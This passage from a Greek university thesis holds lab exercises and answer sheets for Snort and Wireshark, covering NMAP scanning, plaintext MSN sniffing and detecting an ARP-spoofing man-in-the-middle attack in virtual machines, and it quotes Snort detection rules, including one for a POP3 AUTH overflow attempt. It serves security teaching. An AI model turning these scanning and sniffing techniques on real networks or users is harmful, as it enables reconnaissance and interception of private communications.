Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 278: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

278 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Snort

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Χρησιμοποιήστε το κατάλληλο flag για να εμφανίσετε τα διαθέσιμα interfaces και τρέξτε το snort σε

κατάσταση sniffer. Καταγράψτε τις ενέργειές σας;

2. Με Ctrl c διακόψτε την καταγραφή. Όπως παρατηρείτε δεν εμφανίζονται οι επικεφαλίδες των data-

link. Εντοπίστε το flag που τις εμφανίζει ως raw packets σε και καταγράψτε την εντολή που

χρησιμοποιήσατε.

3. Χρησιμοποιήστε την κατάλληλη εντολή για να θέσετε το snort σε κατάσταση Packet Logger

προσδιορίζοντας τον κατάλογο αποθήκευσης του αρχείου καταγραφής; Ποια εντολή

χρησιμοποιήσατε;

4. Αιτηθείτε μέσω του φυλλομετρητή μια ιστοσελίδα και πατήστε Ctrl c διακόψτε την καταγραφή.

Εισάγετε το αρχείο καταγραφής που μόλις δημιουργήθηκε στο Wireshark. Μπορείτε να δείτε τη

σελίδα που αιτηθήκατε; Επισυνάψτε μια εκτύπωση.

5. Χρησιμοποιήστε την κατάλληλη εντολή για να θέσετε το snort σε κατάσταση IDS προσδιορίζοντας

τον κατάλογο αποθήκευσης του αρχείου καταγραφής; Ποια εντολή χρησιμοποιήσατε;

Page 279: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

279 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6. Από ένα άλλο μηχάνημα δοκιμάστε να κάνετε ping στο μηχάνημα που τρέχει το snort και να

προσπελάσετε τον telnet server. Οι ενέργειές σας καταγράφηκαν στο log αρχείο; Επισυνάψτε το

αρχείο καταγραφής.

Page 280: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

280 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.10.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Snort

Εργαλείο Snort

Γνωστικό Πεδίο Ανίχνευση Εισβολών (Intrusion Detection)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η παρουσίαση των δυνατοτήτων του εργαλείου όσον αφορά

την ανίχνευση εισβολών. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν

έννοιες που σχετίζονται με:

• παρακολούθηση και την καταγραφή της κίνησης του δικτύου

• τον εντοπισμό εισβολών στο δίκτυο

Περιγραφή

Αρχικά θα τεθεί το Snort σε κατάσταση ανίχνευσης εισβολών. Στη συνέχεια, θα

χρησιμοποιηθεί το εργαλείο NMAP για τον εντοπισμό των ενεργών κόμβους του δικτύου,

των θυρών που ακροάζονται στον κόμβο που θα επιλεγεί ως στόχος και των προσδιορισμό

των υπηρεσιών που εκτελούνται σε αυτόν. Ο κόμβος στόχος θα είναι το μηχάνημα στο οποίο

εκτελείται το Snort. Το Snort θα καταγράψει τις σαρώσεις πο υ θα πραγματοποιήσει το

NMAP και συγκεκριμένα θα προσδιορίσει τα είδη τους καθώς και το τις πληροφορίες που

έχει συλλέξει ο επιτιθέμενος για τις ανοιχτές θύρες του κόμβου στόχου.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 281: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

281 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Snort

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια εντολή σάρωσης χρησιμοποιήσατε με το εργαλείο ΝΜΑΡ για να εντοπίσετε τους ενεργούς

κόμβους του δικτύου; Καταγράψτε τα ευρήματά σας.

2. Ποια εντολή χρησιμοποιήσατε για τον προσδιορισμό των ανοιχτών θυρών του κόμβου στόχου, των

υπηρεσιών που εκτελούνται σε αυτές και του λειτουργικού συστήματος; Καταγράψτε τα ευρήματά

σας.

3. Το Snort εντόπισε τις σαρώσεις με το ΝΜΑΡ; Αν ναι ποια είναι η ΙΡ διεύθυνση του επιτιθέμενου;

4. Τι πληροφορίες σας παρέχει σχετικά με τα είδη σάρωσης που χρησιμοποιήθηκαν; Συμφωνούν με τα

είδη που χρησιμοποιήσατε εσείς?

5. Τι ενημέρωση σας παρέχει σχετικά με τις πληροφορίες που έχει συλλέξει ο επιτιθέμενος;

6. Πώς μπορούν να αξιοποιηθούν από τον επιτιθέμενο οι πληροφορίες που συνέλλεξε; Πιστεύεται ότι

πρέπει να γίνουν κάποιες αλλαγές στον κόμβο στόχο για την προστασία του;

Page 282: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

282 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.10.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Snort

Εργαλείο Snort

Γνωστικό Πεδίο Ανίχνευση Εισβολών (Intrusion Detection)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι να αναπτύξουν οι φοιτητές ικανότητες δημιουργίας

κανόνων με το Snort ώστε να είναι σε θέση να προσαρμόζουν το εργαλείο στις ανάγκες του

εκάστοτε πληροφοριακού συστήματος. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να

κατανοήσουν:

• τον τρόπο σύνταξης των κανόνων

• την δημιουργία ειδοποιήσεων προς στον διαχειριστή του συστήματος

• τη διαδικασία ελέγχου των κανόνων που έχουν δημιουργήσει

Περιγραφή

Αρχικά οι φοιτητές θα πρέπει να ερμηνεύσουν τη λειτουργία δύο από τους έτοιμους κανόνες

του Snort. Στη συνέχεια πρέπει να γράψουν τρεις δικούς τους κανόνες και να δοκιμάσουν τη

λειτουργία τους. Προτείνεται να δημιουργήσουν κανόνες οι οποίοι θα ενημερώνουν τον

υπεύθυνο του συστήματος για τα εξής:

• προβολή ακατάλληλου περιεχομένου (βία, πορνογραφία) στον υπολογιστή του χρήστη

• σύνδεση του χρήση στο Facebook

• προβολή βίντεο από το youtube

Αφού δημιουργήσουν τους κανόνες θα ονομάσουν το αρχείο custom_alerts.rules

και θα το αποθηκεύσουν στο φάκελο rules του Snort. Επιπλέον θα πρέπει να

Page 283: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

283 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ενημερώσουν το αρχείο snort.conf ώστε να συμπεριλαμβάνονται αυτοί οι κανόνες στην

ανίχνευση.

Έπειτα θα θέσουν το Snort σε λειτουργία ανίχνευσης εισβολών και θα πλοηγηθούν στις

σελίδες που αφορούν οι κανόνες.

Τέλος θα πρέπει να ελέγξουν αν στο αρχείο καταγραφών έχουν καταγραφεί οι επισκέψεις

στις ανωτέρω ιστοσελίδες

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο, καθώς και το αρχείο καταγραφής του Snort με τη δοκιμή

των κανόνων που δημιούργησαν.

Page 284: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

284 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Snort

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Προσδιορίστε τη λειτουργία του εξής κανόνα: alert tcp $EXTERNAL_NET any ->

$HOME_NET 110 (msg:"POP3 AUTH overflow attempt";

flow:to_server,established; content:"AUTH"; nocase;

isdataat:50,relative; pcre:"/^AUTH\s[^\n]{50}/smi"; metadata:service

pop3; reference:bugtraq,830; reference:cve,1999-0822;

reference:nessus,10184; classtype:attempted-admin; sid:1936; rev:9;)

2. Προσδιορίστε τη λειτουργία του εξής κανόνα: alert tcp $HOME_NET any <>

$EXTERNAL_NET 1863 (msg:"CHAT MSN message"; flow:established;

content:"MSG "; depth:4; content:"Content-Type|3A|"; nocase;

content:"text/plain"; distance:1; metadata:policy security-ips drop;

classtype:policy-violation; sid:540; rev:12;)

3. Δημιουργήστε έναν κανόνα που να ενημερώνει το διαχειριστή του συστήματος ότι κάποιος χρήστης

προβάλει στον υπολογιστή του σελίδες που περιέχουν βία.

4. Δημιουργήστε έναν κανόνα που να ενημερώνει το διαχειριστή του συστήματος ότι κάποιος χρήστης

έχει συνδεθεί στο Facebook

Page 285: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

285 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

5. Δημιουργήστε έναν κανόνα που να ενημερώνει το διαχειριστή του συστήματος ότι κάποιος χρήστης

προβάλλει βίντεο από το youtube.

6. Το snort κατέγραψε τις επισκέψεις σας στις ιστοσελίδες που αφορούσαν οι κανόνες που

δημιουργήσατε; Αναλύστε τα ευρήματά σας.

Page 286: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

286 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.11 Wireshark

6.11.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Wireshark

Εργαλείο Wireshark

Γνωστικό Πεδίο Καταγραφή Δικτυακής Κίνησης

(Network Packet Sniffer)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τη λειτουργία του εργαλείου

και τις δυνατότητές του. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν

έννοιες σχετικά με:

• την ανάκτηση πληροφοριών από τα πακέτα που διακινούνται στο δίκτυο

• τον εντοπισμό μη επιτρεπτών ενεργειών στο δίκτυο

Περιγραφή

Σε αυτή την άσκηση θα χρησιμοποιηθούν τρία εικονικά μηχανήματα. Στο ένα είναι

εγκατεστημένο το Wireshark και στο άλλο είναι ενεργή η εφαρμογή utorrent από την οποία

γίνεται λήψη αρχείων με αποτέλεσμα να παρατηρείται χαμηλή ταχύτητα σύνδεσης στο

διαδίκτυο. Οι φοιτητές θα πρέπει να προσδιορίσουν γιατί η ταχύτητα σύνδεσης στο

διαδίκτυο είναι χαμηλή και ποιο μηχάνημα ευθύνεται γι’ αυτό. Επίσης θα πρέπει να

θεωρήσουν ότι η πολιτική ασφάλειας του δικτύου δεν επιτρέπει την χρήση εφαρμογών pear-

to-pear.

Για την πραγματοποίηση τα άσκησης προτείνεται να γίνει σύλληψη πακέτων με την

εφαρμογή Wireshark για τουλάχιστον 5 λεπτά ώστε να υπάρχει ένα ασφαλές δείγμα

πακέτων.

Page 287: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

287 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εναλλακτικά μπορεί να έχει γίνει η σύλληψη πακέτων προηγουμένως και να χρησιμοποιηθεί

το αρχείο καταγραφής για την ανάλυση των πακέτων.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 288: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

288 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Wireshark

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποιος είναι ο αριθμός των πακέτων που έχουν διακινηθεί στο δίκτυο στο χρονικό διάστημα που

διήρκησε η καταγραφή και ποια η μέση ταχύτητα διακίνησης; Δικαιολογεί αυξημένη δικτυακή

κίνηση;

2. Εντοπίστε και καταγράψτε την ΙΡ διεύθυνση που ανταλλάσσει τα περισσότερα πακέτα. Προσδιορίστε

το είδος της κίνησης (εισερχόμενη- εξερχόμενη);

3. Τι παρατηρείτε για τον αριθμό των συνδέσεων στη συγκεκριμένη διεύθυνση; Τι υποψιάζεστε ότι

μπορεί να συμβαίνει;

4. Χρησιμοποιήστε το κατάλληλο φίλτρο για να επιβεβαιώσετε ή να διαψεύσετε τις υποψίες σας. Τι

διαπιστώνετε;

5. Ποιοι είναι οι κίνδυνοι που αντιμετωπίζει το ΠΣ από αυτού του είδους τη δικτυακή κυκλοφορία;

Page 289: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

289 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.11.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Wireshark

Εργαλείο Wireshark

Γνωστικό Πεδίο Καταγραφή Δικτυακής Κίνησης

(Network Packet Sniffer)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τη λειτουργία του εργαλείου

και συγκεκριμένα με τη δυνατότητα συλλογής πληροφοριών απλού κειμένου. Αναμένεται

μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με:

• τις μεθόδους συλλογής πληροφοριών των επιτιθέμενων

• το είδος των πληροφοριών που μπορούν να συλλέξουν από εφαρμογές που

χρησιμοποιούν απλό κείμενο

• την επικινδυνότητα των πληροφοριών αυτών για την ασφάλεια του πληροφοριακού

συστήματος

Περιγραφή

Σε αυτή την άσκηση θα χρησιμοποιηθούν δύο εικονικά μηχανήματα στα οποία υπάρχει

εγκατεστημένος ο MSN messenger, ενώ στο ένα εξ’ αυτών είναι εγκατεστημένο το

Wireshark. Αρχικά τίθεται σε λειτουργία η συλλογή πακέτων στο Wireshark. Στη συνέχεια

οι χρήστες εκκινούν την εφαρμογή MSN messenger στα δύο εικονικά μηχανήματα και

αρχίζουν να επικοινωνούν μεταξύ τους γράφοντας μηνύματα απλού κειμένου. Έπειτα από

την ανταλλαγή μερικών μηνυμάτων διακόπτεται η λειτουργία συλλογής πακέτων από το

Wireshark και οι φοιτητές θα πρέπει να αναλύσουν τα πακέτα που συνέλεξε η εφαρμογή.

Για ευκολία στην ανάλυση των πακέτων προτείνεται η χρήση του φίλτρου MSMNS.

Page 290: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

290 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Για την πραγματοποίηση τα άσκησης απαιτείται η ύπαρξη δύο λογαριασμών χρηστών στον

MSN messenger.

Εναλλακτικά μπορεί να έχει γίνει η σύλληψη πακέτων προηγουμένως και να χρησιμοποιηθεί

το αρχείο καταγραφής για την ανάλυση των πακέτων.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο καθώς και το αρχείο καταγραφής.

Page 291: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

291 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Wireshark

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Από την ανάλυση των πακέτων, κατά την εκκίνηση του MSN messenger στο μηχάνημα που είναι

εγκατεστημένο το Wireshark τι είδους πληροφορίες συλλέγετε για το χρήστη της εφαρμογής;

2. Τι είδους πληροφορίες συλλέγονται για τον συνομιλητή του χρήστη, της εφαρμογής MSN messenger;

3. Από την ανάλυση των πακέτων, τι παρατηρείτε για τη συνομιλία των δύο χρηστών του MSN

messenger;

4. Πώς μπορεί να αξιοποιήσει κάποιος επιτιθέμενος τις πληροφορίες που συνέλεξε για τους χρήστες του

MSN messenger;

5. Περιγράψτε εν συντομία ένα απειλητικό για το ΠΣ σενάριο αξιοποιώντας τη δυνατότητα του

Wireshark που μελετήθηκε σε αυτό το εργαστήριο;

Page 292: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

292 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.11.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Wireshark

Εργαλείο Wireshark

Γνωστικό Πεδίο Καταγραφή Δικτυακής Κίνησης

(Network Packet Sniffer)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η ανάδειξη της δυνατότητας του εργαλείου να εντοπίζει

επιθέσεις Man In The Middle μέσω της καταγραφής των πακέτων που διακινούνται στο

δίκτυο. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά

με:

• τις επιθέσεις Man In The Middle

• τη χρήση των πιστοποιητικών

Περιγραφή

Σε αυτή την άσκηση θα χρησιμοποιηθούν τρία εικονικά μηχανήματα. Κάποιο από αυτά έχει

πραγματοποιήσει ARP Spoofing, με χρήση του Cain, σε έναν άλλο υπολογιστή του δικτύου.

Οι φοιτητές θα πρέπει να διαπιστώσουν ότι μια ιστοσελίδα που κανονικά χρησιμοποιεί

ασφαλή σύνδεση μέσω του πρωτοκόλλου SSL για την εισαγωγή διαπιστευτηρίων, στην

προκειμένη περίπτωση χρησιμοποιεί πιστοποιητικά μιας ανεξάρτητης αρχής

πιστοποιητικών. Στη συνέχεια θα πρέπει να εντοπίσουν το μηχάνημα από το οποίο έχει γίνει

ARP Spoofing

Για την πραγματοποίηση τα άσκησης θα γίνει καταγραφή των πακέτων που ανταλλάσσονται

μεταξύ του υπολογιστή στον οποίο έχει γίνει ARP Spoofing και του δικτύου με την

εφαρμογή Wireshark. Εναλλακτικά μπορεί να έχει γίνει η σύλληψη πακέτων προηγουμένως

και να χρησιμοποιηθεί το αρχείο καταγραφής για την ανάλυση των πακέτων.

Page 293: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

293 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Στη συνέχεια, θα διαγραφούν από τα ARP Tables του υπολογιστή θύμα οι καταχωρήσεις

που σχετίζεται με τον προεπιλεγμένο δρομολογητή του δικτύου (default gateway). Θα γίνει

χρήση φίλτρων του Wireshark που απομονώνουν τα ARP πακέτα και αφορούν τον default

gateway και έπειτα προσπάθεια σύνδεσης σε μια εξωτερική IP. Οι φοιτητές θα πρέπει να

παρατηρήσουν μέσω του Wireshark ότι δίνεται διπλή ARP απάντηση και συγκεκριμένα ότι

ενώ στην αρχή ο δρομολογητής απαντά με την κανονική MAC διεύθυνση του, στη συνέχεια

φαινομενικά αλλάζει MAC διεύθυνση και απαντά με αυτή του επιτιθέμενου. Έτσι,

εντοπίζεται η MAC διεύθυνση του επιτιθέμενου.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 294: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

294 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Wireshark

